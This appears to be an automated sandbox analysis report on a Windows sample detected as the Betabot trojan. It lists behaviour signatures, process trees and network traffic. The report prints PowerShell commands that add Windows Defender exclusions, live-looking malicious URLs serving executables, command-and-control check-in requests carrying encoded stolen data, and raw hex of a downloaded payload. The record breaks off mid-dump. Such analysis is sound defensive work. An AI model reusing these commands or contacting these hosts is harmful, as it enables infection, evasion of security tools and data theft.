Create Interactive Tour

Analysis Report Documento--SII--33875.bin

Overview

General Information

Sample Name:	Documento--SII--33875.bin (renamed file extension from bin to exe)
Analysis ID:	366082
MD5:	2ced2c14eece71c72c5e45e8a607bb4c
SHA1:	13a700a297a7e5697d69bb743c3b256ac10a14e2
SHA256:	4efd9a3fa2d25d6706213feb3299dd0f73777aad01217b9e3df046064fdbbb7e
Infos:
Most interesting Screenshot:

Detection

Betabot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Betabot

Adds a directory exclusion to Windows Defender

Contains functionality to create processes via WMI

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Creates files in alternative data streams (ADS)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies Internet Explorer zone settings

Overwrites Windows DLL code with PUSH RET codes

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Changes image file execution options

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Disables exception chain validation (SEHOP)

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Enables driver privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Queries information about the installed CPU (vendor, model number etc)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Documento--SII--33875.exe (PID: 5464 cmdline: 'C:\Users\user\Desktop\Documento--SII--33875.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

Documento--SII--33875.exe (PID: 4948 cmdline: 'C:\Users\user\Desktop\Documento--SII--33875.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

explorer.exe (PID: 3696 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

CpSHySoEfzH.exe (PID: 2244 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 240 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 4644 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 3060 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 4668 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 4612 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 2588 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 1688 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 2248 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 2188 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 3332 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

CpSHySoEfzH.exe (PID: 2036 cmdline: MD5: 77276DDC82248473D033E2494C438A97)

9sek3aw7533q9_1.exe (PID: 6368 cmdline: /suac MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

iom7q73oi.exe (PID: 6152 cmdline: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe MD5: 08CDFD0D3A406601C42F087DA16EC6C8)

powershell.exe (PID: 5840 cmdline: 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\' MD5: 95000560239032BC68B4C2FDFCDEF913)

powershell.exe (PID: 4540 cmdline: 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\' MD5: 95000560239032BC68B4C2FDFCDEF913)

9sek3aw7533q9.exe (PID: 736 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

9sek3aw7533q9.exe (PID: 6208 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

9sek3aw7533q9.exe (PID: 6576 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

9sek3aw7533q9.exe (PID: 6616 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

9sek3aw7533q9.exe (PID: 6276 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

9sek3aw7533q9.exe (PID: 5704 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

9sek3aw7533q9.exe (PID: 5236 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: explorer.exe PID: 3696	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: Documento--SII--33875.exe PID: 4948	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: 9sek3aw7533q9.exe PID: 6616	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: CpSHySoEfzH.exe PID: 3332	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: CpSHySoEfzH.exe PID: 2188	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: CpSHySoEfzH.exe PID: 2036	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: CpSHySoEfzH.exe PID: 3060	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: CpSHySoEfzH.exe PID: 4612	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: 9sek3aw7533q9.exe PID: 5704	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: CpSHySoEfzH.exe PID: 2248	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: 9sek3aw7533q9.exe PID: 6208	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: CpSHySoEfzH.exe PID: 4668	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author
5.2.CpSHySoEfzH.exe.4650000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
20.2.CpSHySoEfzH.exe.3bd0000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
21.2.9sek3aw7533q9.exe.2160000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
32.2.9sek3aw7533q9.exe.8c0000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
3.2.explorer.exe.2a00000.3.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
14.2.9sek3aw7533q9.exe.960000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
23.2.CpSHySoEfzH.exe.4060000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
26.2.CpSHySoEfzH.exe.4470000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
9.2.CpSHySoEfzH.exe.3b10000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
18.2.CpSHySoEfzH.exe.3ed0000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
7.2.CpSHySoEfzH.exe.3b70000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
8.2.CpSHySoEfzH.exe.41d0000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
2.2.Documento--SII--33875.exe.22a0000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
15.2.CpSHySoEfzH.exe.3740000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
29.2.CpSHySoEfzH.exe.4000000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
16.2.CpSHySoEfzH.exe.3dd0000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
10.2.CpSHySoEfzH.exe.3ad0000.1.raw.unpack	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Click to see the 12 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://l0ioz.icu/pub/bin.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe

Avira: detection malicious, Label: TR/Spy.Gen

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe	ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Show sources

Source: Documento--SII--33875.exe

Virustotal: Detection: 49%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Documento--SII--33875.exe

Joe Sandbox ML: detected

Source: 14.1.9sek3aw7533q9.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.1.Documento--SII--33875.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 3.2.explorer.exe.6870000.6.unpack	Avira: Label: TR/Dropper.Gen
Source: 33.2.9sek3aw7533q9_1.exe.11d0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.Documento--SII--33875.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 31.2.9sek3aw7533q9.exe.1180000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.Documento--SII--33875.exe.11c0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.9sek3aw7533q9.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 34.2.iom7q73oi.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen
Source: 32.2.9sek3aw7533q9.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 32.1.9sek3aw7533q9.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 19.2.9sek3aw7533q9.exe.11e0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 21.1.9sek3aw7533q9.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 21.2.9sek3aw7533q9.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 34.0.iom7q73oi.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen
Source: 11.2.9sek3aw7533q9.exe.12e0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Unpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack

Source: Documento--SII--33875.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 104.21.55.228:443 -> 192.168.2.5:49717 version: TLS 1.2

Source:	Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb} source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
Source:	Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\skunk\Desktop\SPCL\PPP\proyecto polinesia francesa\extractor\new\GetDataAVK\2\GetDataAVK\obj\Debug\GetDataAVK.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49715 -> 212.114.52.43:80
Source: Traffic	Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.5:49716 -> 104.21.55.228:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 10 Mar 2021 10:42:34 GMTServer: ApacheLast-Modified: Wed, 10 Mar 2021 05:36:15 GMTAccept-Ranges: bytesContent-Length: 680448Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee 58 48 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 58 0a 00 00 08 00 00 00 00 00 00 ce 76 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 76 0a 00 57 00 00 00 00 80 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0a 00 0c 00 00 00 c4 75 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 56 0a 00 00 20 00 00 00 58 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 80 0a 00 00 06 00 00 00 5a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0a 00 00 02 00 00 00 60 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 76 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 18 a4 09 00 ac d1 00 00 03 00 00 00 c1 01 00 06 a8 95 00 00 70 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 e1 01 00 06 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 4a 02 04 28 03 00 00 0a 00 00 02 03 28 03 00 00 06 00 2a 00 13 30 02 00 0d 00 00 00 01 00 00 11 00 02 03 73 04 00 00 06 0a 2b 00 06 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 36 02 03 04 14 14 28 09 00 00 06 00 00 2a 13 30 04 00 4c 00 00 00 02 00 00 11 73 0d 00 00 06 0a 06 0e 04 7d 03 00 00 04 02 03 04 28 04 00 00 06 00 00 05 2c 0b 06 7b 03 00 00 04 14 fe 03 2b 01 16 0b 07 2c 20 00 02 05 6f 95 00 00 06 06 fe 06 0e 00 00 06 73 04 00 00 0a 28 01 00 00 2b 28 07 00 00 06 00 00 2a 13 30 02 00 0d 00 00 00 03 00 00 11 00 02 03 73 08 00 00 06 0a 2b 00 06 2a 00 00 00 13 30 04 00 0f 00 00 00 03 00 00 11 00 02 03 04 05 73 09 00 00 06 0a 2b 00 06 2a 00 13 30 04 00 19 00 00 00 03 00 00 11 00 02 6f 02 00 00 06 02 6f 06 00 00 0a 03 04 73 09 00 00 06 0a 2b 00 06 2a 22 02 28 07 00 00 0a 00 2a 6e 03 6f b5 00 00 06 2d 11 03 02 7b 03 00 00 04 6f bb 00 00 06 14 fe 01 2b 01 16 2a 1e 02 7b 1e 00 00 04 2a 22 02 03 7d 1e 00 00 04 2a 1e 02 7

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
Source: Joe Sandbox View	ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c

Source: global traffic	HTTP traffic detected: POST /forum/logout.php?page=7 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 1081Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zakriasons.coCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 4727Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /old/GetDataAVK.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: estrelladamm.icuCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 633Cache-Control: no-cacheData Raw: 6c 63 6e 65 70 67 78 69 7a 3d 35 36 30 37 35 32 31 26 6e 67 74 6d 7a 3d 37 61 39 31 62 31 65 34 30 65 30 35 65 37 34 30 26 70 6b 7a 75 6a 65 7a 3d 30 39 39 46 35 36 30 44 33 35 41 43 34 38 44 46 34 46 36 42 39 44 46 38 44 38 45 45 33 44 30 38 45 42 41 44 45 34 41 36 42 45 41 45 37 32 32 38 39 37 37 32 30 45 33 43 30 38 46 31 36 34 31 38 37 43 42 38 44 34 39 35 42 34 43 31 32 34 32 34 35 37 30 45 34 33 43 45 34 38 36 36 31 42 45 38 30 39 39 37 46 30 42 46 31 31 32 32 32 32 41 32 41 45 32 36 30 36 42 42 34 39 44 31 36 44 35 32 38 41 34 42 35 45 30 37 36 37 33 43 44 33 34 43 37 32 42 43 37 45 33 30 46 39 33 34 39 44 35 36 32 42 42 41 35 36 41 30 45 34 45 35 35 32 42 44 35 37 39 41 46 45 30 30 37 46 33 39 45 34 45 46 34 39 39 45 34 42 41 41 30 41 46 39 44 33 33 37 45 35 34 41 32 46 41 44 34 33 38 35 30 33 31 39 42 46 34 31 44 42 33 37 32 34 37 45 46 38 41 32 35 36 34 41 36 41 34 32 42 46 38 38 39 32 44 34 33 42 33 41 41 30 30 32 32 37 44 43 41 30 42 35 42 46 30 42 39 39 35 39 34 46 46 46 41 37 34 44 34 43 39 38 34 38 45 36 33 41 36 39 45 46 46 33 39 32 46 44 42 43 31 39 38 33 45 39 31 30 30 46 39 33 46 35 36 44 37 37 35 30 38 33 41 32 36 39 44 44 39 43 46 33 36 44 44 44 33 38 36 42 30 36 46 34 45 37 37 38 39 39 37 34 45 30 32 31 30 45 43 38 36 32 44 36 37 45 33 31 30 44 36 42 46 46 32 43 36 39 38 43 46 39 36 41 46 32 45 32 32 41 36 46 35 42 31 37 30 36 39 41 39 30 35 44 43 34 37 41 38 45 36 39 34 42 45 41 46 37 31 35 38 45 35 32 45 32 37 44 37 30 41 41 41 38 42 37 41 31 46 42 32 44 39 46 43 38 45 37 46 35 44 43 32 42 31 33 45 36 41 39 33 45 33 39 36 45 37 42 42 35 43 37 44 45 38 38 39 38 31 38 35 35 45 36 45 44 41 33 37 43 34 34 36 41 34 37 45 37 34 30 45 41 46 33 41 45 32 46 33 43 30 43 42 32 38 31 30 33 32 42 43 41 30 30 45 30 45 37 39 32 45 35 46 45 33 31 33 46 31 39 32 45 37 34 36 39 39 30 37 39 41 36 46 35 43 43 45 32 44 43 46 33 43 31 34 46 45 38 43 34 44 35 31 30 Data Ascii: lcnepgxiz=5607521&ngtmz=7a91b1e40e05e740&pkzujez=099F560D35AC48DF4F6B9DF8D8EE3D08EBADE4A6BEAE722897720E3C08F164187CB8D495B4C12424570E43CE48661BE80997F0BF112222A2AE2606BB49D16D528A4B5E07673CD34C72BC7E30F9349D562BBA56A0E4E552BD579AFE007F39E4EF499E4BAA0AF9D337E54A2FAD43850319BF41DB37247EF8A2564A6A42BF8892D43B3AA00227DCA0B5BF0B99594FFFA74D4C9848E63A69EFF392FDBC1983E9100F93F56D775083A269DD9CF36DDD386B06F4E7789974E0210EC862D67E310D6BFF2C698CF96AF2E22A6F5B17069A905DC47A8E694BEAF7158E52E27D70AAA8B7A1FB2D9FC8E7F5DC2B13E6A93E396E7BB5C7DE88981855E6EDA37C446A47E740EAF3AE2F3C0CB281032BCA00E0E792E5FE313F192E74699079A6F5CCE2DCF3C14FE8C4D510
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 693Cache-Control: no-cacheData Raw: 6d 79 6b 77 6f 61 3d 64 62 37 62 63 32 62 38 65 62 31 64 39 64 35 64 39 33 39 64 65 62 65 35 33 34 35 31 37 64 34 61 65 36 34 38 36 63 37 66 34 61 34 35 31 64 32 35 39 30 34 35 63 32 39 38 34 34 32 31 36 32 61 61 38 33 61 37 66 36 30 63 34 65 32 64 34 65 26 6b 75 65 6f 3d 36 30 38 34 37 33 36 32 26 6f 63 71 65 79 6d 61 6f 3d 30 34 61 64 35 64 32 62 38 64 66 34 38 64 39 33 65 39 38 63 64 64 38 32 63 65 33 35 38 34 64 62 30 65 61 61 64 38 38 39 63 65 66 34 61 62 33 31 37 39 36 32 32 36 32 37 38 34 32 63 62 31 31 65 35 37 32 65 33 63 30 66 30 37 63 38 39 65 30 36 62 63 64 31 35 30 63 34 32 35 61 65 64 39 61 39 64 35 63 36 32 62 32 35 36 65 39 37 34 30 32 33 34 62 38 30 64 61 35 30 32 61 31 65 34 36 65 30 64 65 34 63 35 64 34 30 63 32 36 31 39 38 35 32 35 35 64 39 33 39 39 65 62 66 35 39 36 38 63 63 35 34 64 39 62 30 35 37 35 65 35 36 66 39 30 62 37 65 35 35 31 33 39 62 32 30 62 66 64 64 33 61 63 62 64 64 36 61 34 36 39 31 32 36 30 33 37 36 63 31 64 62 34 65 30 39 35 34 35 65 39 33 33 39 62 35 37 39 39 37 32 39 65 66 66 37 39 35 64 34 65 61 63 36 33 61 38 33 35 38 39 32 66 63 37 39 37 33 39 34 34 61 64 30 32 35 61 33 31 37 39 39 36 63 30 34 32 34 65 66 63 64 39 36 65 30 62 61 37 31 65 39 35 34 37 66 65 64 32 35 34 64 38 33 66 38 30 34 30 63 63 36 35 39 33 31 35 35 30 30 61 63 35 61 30 36 36 61 35 35 30 63 64 36 64 33 30 30 30 34 30 39 62 38 36 31 63 64 39 37 64 36 62 30 65 63 65 37 32 35 33 39 37 66 33 30 38 61 34 31 32 39 36 33 36 33 66 36 39 39 65 30 63 34 39 63 61 32 33 65 31 34 62 39 38 35 31 65 30 66 64 37 36 35 33 36 31 35 34 61 64 66 32 35 63 63 39 66 63 31 31 31 30 61 33 63 34 37 35 37 66 34 64 37 30 32 30 38 33 30 31 34 66 61 39 30 62 35 35 63 65 39 61 33 38 39 62 38 64 63 62 65 37 36 33 33 62 37 31 37 61 31 64 35 64 66 32 61 31 39 31 38 31 36 64 39 39 66 31 38 30 63 61 34 66 62 64 64 66 33 35 38 62 31 30 66 39 36 34 37 63 37 37 63 62 65 38 33 31 30 62 64 34 61 30 32 65 31 39 30 63 32 35 62 36 64 36 62 61 66 38 30 38 36 63 66 32 34 65 66 39 66 39 36 66 34 35 31 39 32 66 36 65 63 35 30 31 31 32 34 38 35 30 33 64 38 61 32 61 32 61 30 35 30 Data Ascii: 